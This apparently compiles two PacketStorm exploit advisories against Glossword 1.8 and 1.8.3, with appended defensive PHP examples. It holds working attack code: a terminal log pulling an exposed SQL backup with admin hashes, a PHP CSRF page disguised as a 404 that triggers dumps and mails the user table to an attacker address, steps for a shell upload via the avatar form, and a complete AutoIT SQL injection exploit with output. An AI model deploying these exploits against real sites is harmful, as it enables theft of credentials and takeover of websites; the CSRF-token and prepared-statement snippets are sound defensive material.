65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb 3 08:40 backup_gwnew_dict.sql
65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb 3 08:41 backup_gwnew_history_terms.sql
65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb 3 08:40 backup_gwnew_import_sessions.sql
65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user 326 Feb 3 08:41 backup_gwnew_map_user_to_dict.sql
65370 24K -rwxrwxrwx 1 hacker1user hacker1user 23K Feb 3 08:41 backup_gwnew_map_user_to_term.sql
65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb 3 08:40 backup_gwnew_pages_phrase.sql
65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb 3 08:40 backup_gwnew_pages.sql
65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user 485 Feb 3 08:40 backup_gwnew_search_results.sql
65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user 538 Feb 3 08:40 backup_gwnew_sessions.sql
65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb 3 08:40 backup_gwnew_settings.sql
65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user 321 Feb 3 08:40 backup_gwnew_stat_dict.sql
65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user 599 Feb 3 08:40 backup_gwnew_stat_search.sql
65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb 3 08:41 backup_gwnew_theme_group.sql
65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb 3 08:41 backup_gwnew_theme_settings.sql
65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:41 backup_gwnew_theme.sql
65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user 908 Feb 3 08:40 backup_gwnew_topics_phrase.sql
65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user 761 Feb 3 08:40 backup_gwnew_topics.sql
65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb 3 08:40 backup_gwnew_users.sql
65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user 949 Feb 3 08:40 backup_gwnew_virtual_keyboard.sql
65375 32K -rwxrwxrwx 1 hacker1user hacker1user 29K Feb 3 09:03 backup_gwnew_wordlist.sql
65376 48K -rwxrwxrwx 1 hacker1user hacker1user 46K Feb 3 08:41 backup_gwnew_wordmap.sql
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmp
root@debian:/tmp# wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql
--2013-02-03 09:13:17-- http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3184 (3.1K) [text/plain]
Saving to: “backup_gwnew_users.sql”

100%[======================================================================================>] 3,184 --.-K/s in 0s

2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184]

SET NAMES 'utf8';
DROP TABLE IF EXISTS `gwnew_users`;
CREATE TABLE `gwnew_users` (
  `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `login` varbinary(128) NOT NULL,
  `password` char(32) NOT NULL,
  `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `date_reg` int(10) unsigned NOT NULL DEFAULT '0',
  `date_login` int(10) unsigned NOT NULL DEFAULT '0',
  `int_items` int(10) unsigned NOT NULL DEFAULT '0',
  `user_fname` varbinary(64) NOT NULL,
  `user_sname` varbinary(64) NOT NULL,
  `user_email` varchar(255) NOT NULL,
  `user_perm` blob NOT NULL,
  `user_settings` blob NOT NULL,
  PRIMARY KEY (`id_user`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',[...]);
INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
root@debian:/tmp#

In this example: backup_gwnew_users.sql
gwnew_ is my custom table prefix. In fact while installing script it is = gw_
Feel free to create your own bruteforcer:
Format is: sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sql

Also table prefix is not panacea ANYMORE. If Directory index is not forbidden on remote site/server you can see the whole site.tld/gw_export/sql_backup_2013-02Feb-03/ directory structure and you can download it in that way.

Ok this is not the end. There is another vector of exploitation using CSRF vulnerability.
Here we go (CSRF+database dump stealer)
Simply trick the logged in admin to visit malicious page. If the attack is successful it will silently @mail to you victim's database.

==============EXPLOIT BEGINS=====================
<?php
error_reporting(0);
//echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d');
/* http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/ */
//exit;
define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/');
define("HACKERMAIL",'hacker@g00glemail.tld');
define("STANDARDTABLEPREFIX",'gw_');
header('Status: 404 Not found!');
echo '<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500);
for($i=1;$i<8;$i++)
{
echo '<img src="' . TARGETSITE . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" heigth="0" width="0" />' .PHP_EOL;
}
$data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';
//echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit;
//@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') .
$s=file_get_contents($data);
/*uncomment if you want to save on your server
# file_put_contents(md5(rand(1,1000)) . '.txt',$s);*/
@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL);
exit;
?>
================EXPLOIT ENDS HERE======================

Ok now about the shell upload vulnerability (requires administrative access to site)
After gaining access to the admin panel (e.g. via XSS or using backup disclosure)
Go to: http://site.tld/gw_admin.php?a=edit-own&t=users
Upload your shell using: Avatar settings tab.
Don't bother about: (*The following file types are allowed: jpg, png*) because it is wrong information.
Trace it like this, access it and travel xD
http://s006.radikal.ru/i215/1302/27/d4b52ad33b39.png
Backup image: http://oi47.tinypic.com/crsde.jpg

================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep

Source: PacketStorm
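Two of the findings above share a root cause worth showing side by side: the maintenance action can be fired by a GET from any page the admin visits (the `<img src="gw_admin.php?a=maintenance...">` loop), and the dump it produces is a date-named, 0777 file under the web root. As an added example, not Glossword code, the handler below accepts the maintenance request only as a POST carrying a per-session token, and writes the dump outside DOCUMENT_ROOT with an unguessable name and owner-only permissions. The backup directory, token field name and table name are assumptions.

```php
<?php
// Added example, not Glossword code: CSRF protection for the maintenance action plus
// non-disclosing backup placement. Paths and the "csrf" field name are assumed.
declare(strict_types=1);
session_start();

// (1) CSRF: a per-session token that must be echoed back in a POST body. An <img> tag on
//     a third-party page can only send a GET without the token, so it no longer triggers a dump.
function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function requireCsrf(): void
{
    $sent = (string)($_POST['csrf'] ?? '');   // never read the token from the query string
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST' || !hash_equals(csrfToken(), $sent)) {
        http_response_code(403);
        exit('invalid request token');
    }
}

// (2) Disclosure: write the dump outside the document root, with a random suffix and
//     0600 permissions, instead of a predictable sql_backup_<date>/backup_<prefix>_users.sql
//     left world-readable under gw_temp/gw_export/.
function writeBackup(string $backupRoot, string $table, string $sql): string
{
    $docroot = realpath($_SERVER['DOCUMENT_ROOT'] ?? '/var/www');
    $root    = realpath($backupRoot);
    if ($root === false) {
        throw new RuntimeException('backup directory does not exist');
    }
    if ($docroot !== false && strncmp($root . '/', $docroot . '/', strlen($docroot) + 1) === 0) {
        throw new RuntimeException('backup directory must lie outside the web root');
    }
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException('bad table name');
    }
    $file = sprintf('%s/backup_%s_%s_%s.sql', $root, $table, date('Y-m-d'), bin2hex(random_bytes(16)));

    $old = umask(0077);                         // strip group/other bits regardless of the process umask
    try {
        if (file_put_contents($file, $sql, LOCK_EX) === false) {
            throw new RuntimeException('write failed');
        }
        chmod($file, 0600);
    } finally {
        umask($old);
    }
    return $file;
}

// Inside the maintenance handler (gw_admin.php?a=maintenance in the advisory), the order is:
//   requireCsrf();
//   $path = writeBackup('/var/backups/glossword', 'gw_users', $dumpSql);   // assumed directory
// and the admin form that posts to it includes <input type="hidden" name="csrf" value="<?= csrfToken() ?>">.
```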
25. Glossword version 1.8.3 remote SQL injection exploit written in AutoIT.

#cs
==============================================================
Vulnerable Software: Glossword 1.8.3
Official site: http://sourceforge.net/projects/glossword/
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/
Vuln: SQLi
==================THIS IS A WHOLE EXPLOIT=====================
Exploit Coded In AutoIT.
To exploit this vulnerability magic_quotes_gpc must be turned off on server side.
Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png
POC video: http://youtu.be/55IaNTQS3Fk

Exploit usage:
C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2

##############################################################
# Glossword 1.8.3 SQL injection Exploit #
# Usage: glossa.exe http://site.tld /installdir/ UID (int) #
# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #
# VULN/Exploit: AkaStep & HERO_AZE #
##############################################################

##############################################################
[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]
##############################################################

##############################################################
[*] CMS is GLOSSWORD! [*]
##############################################################

##############################################################
[*] FETCHING VALID SESSUID [*]
##############################################################

##############################################################
[*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*]
##############################################################

##############################################################
[*] !~ P*W*N*E*D ~! [*]
--------------------------------------------------------------
[*] Login: admin [*]
--------------------------------------------------------------
[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*]
--------------------------------------------------------------
Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php
--------------------------------------------------------------
[*] Good Luck;) [*]
##############################################################
[*] DONE [*]
##############################################################
#ce

#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=glossa.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _
'# Usage: ' & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _
@CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _
'# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)
$method='POST';
$vulnurl='gw_admin/login.php'
Global $sessid=0
$cmsindent='lossword'; # We will use it to identify CMS #;
$adminpanel=$vulnurl
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int)' & @CRLF
if $CmdLine[0] <> 3 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
MsgBox(64,"",$msg_usage);
exit;
EndIf
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$installdir=$CmdLine[2];
$uidtoattack=Number(StringMid($CmdLine[3],1,255));
EndIf
if not StringIsDigit($uidtoattack) Then
ConsoleWrite(' UID is wrong! Exit' );
Exit;
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then
ConsoleWrite('Are you kidding meeeeen?');
Exit;
EndIf
HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)
Exit;
EndIf
sleep(Random(1200,2500,1));
sendfakeretrivevalidsess($targetsite,$installdir)
HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);

Func exploit($targetsite,$installdir,$sessid)
Global $sAddress = $targetsite
Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _
"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _
"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _
" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";
Global $sDomain = $targetsite
Global $sPage = $installdir & $vulnurl
Global $sAdditionalData = $PAYLOADTOSEND
Global $hOpen = _WinHttpOpen($useragent)
Global $hConnect = _WinHttpConnect($hOpen, $sDomain)
Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')
_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)
_WinHttpReceiveResponse($hRequest)
Global $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then
$zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1)
For $x = 0 To UBound($zsuxxv) - 1
Beep(100,1000);
ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _
StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _
_StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _
StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _
' [*] ' & _
StringReplace($triptrop,'#','-') & _
'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _
'[*] Good Luck;) [*]' & _
$triptrop & '[*] DONE [*]' & _
$triptrop);
Next
Else
ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _
' [*]' & $triptrop);
Beep(1500,1000);
Exit
EndIf
EndIf
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
EndFunc;=> exploit();

Func sendfakeretrivevalidsess($targetsite,$installdir)
$fakesessionID='';
Do
$fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)
until StringLen($fakesessionID)=32
$fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)
ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID & ' [*] ' & $triptrop)
sleep(Random(1000,2500,1))
$rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID;
HttpSetUserAgent($useragent);
$str=_INetGetSource($rtarget);
if StringInStr($str,"Session does not exist.") then
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',18) & 'CMS is GLOSSWORD! ' & _StringRepeat(' ',19) & '[*]' & $triptrop);
sleep(Random(1000,2500,1))
Else
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop);
exit;
EndIf
$i=123
$mystr='';
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)
sleep(Random(1000,2500,1))
Do
$i+=1;
if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.//
$mystr&=StringMid($str,$i,1)
until StringInStr($mystr,chr(34));
$sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)
if not $sessid =32 Then
ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID [*]' & $triptrop)
exit;
Else
ConsoleWrite($triptrop & '[*] Got VALID SESSUID: ' & $sessid & ' [*]' & $triptrop)
EndIf
$targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')
exploit($targetsite,$installdir,$sessid)
EndFunc;=>sendfakeretrivevalidsess();

#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
#ce

Source: PacketStorm
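The exploit above works because the lost-password handler concatenates arPost[user_name] into its query against gw_auth, and its only safety net is magic_quotes_gpc. As an added example, not Glossword code, this is the same lookup done with a bound parameter, exercised against a constructed in-memory SQLite table of the same shape: the injection string is matched as a literal login and returns no row. The user_email column and the function name are assumptions; gw_auth, login and password come from the advisory.

```php
<?php
// Added example, not Glossword code: the lost-password lookup on gw_auth with a prepared
// statement, so arPost[user_name] is always data, never SQL, whatever magic_quotes_gpc says.
// Column user_email is assumed; gw_auth / login / password appear in the advisory.
declare(strict_types=1);

function findAccountForLostPass(PDO $db, string $userName, string $userEmail): ?array
{
    // Placeholders are bound, not interpolated. On MySQL also set
    // PDO::ATTR_EMULATE_PREPARES => false so binding happens server-side.
    $stmt = $db->prepare(
        'SELECT id_auth, login FROM gw_auth WHERE login = :login AND user_email = :email LIMIT 1'
    );
    $stmt->execute([':login' => $userName, ':email' => $userEmail]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo table (same shape as gw_auth) in an in-memory SQLite database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE gw_auth (id_auth INTEGER PRIMARY KEY, login TEXT, password TEXT, user_email TEXT)');
$db->exec("INSERT INTO gw_auth VALUES (2, 'admin', 'x', 'admin@example.invalid')");

// The payload shape from the exploit is now just a login string nobody has.
$payload = "') AND (select floor(rand(0)*2) from(select count(*),concat(...)))-- ";
var_dump(findAccountForLostPass($db, $payload, 'trueownage'));           // NULL
var_dump(findAccountForLostPass($db, 'admin', 'admin@example.invalid'));  // ['id_auth' => 2, 'login' => 'admin']
```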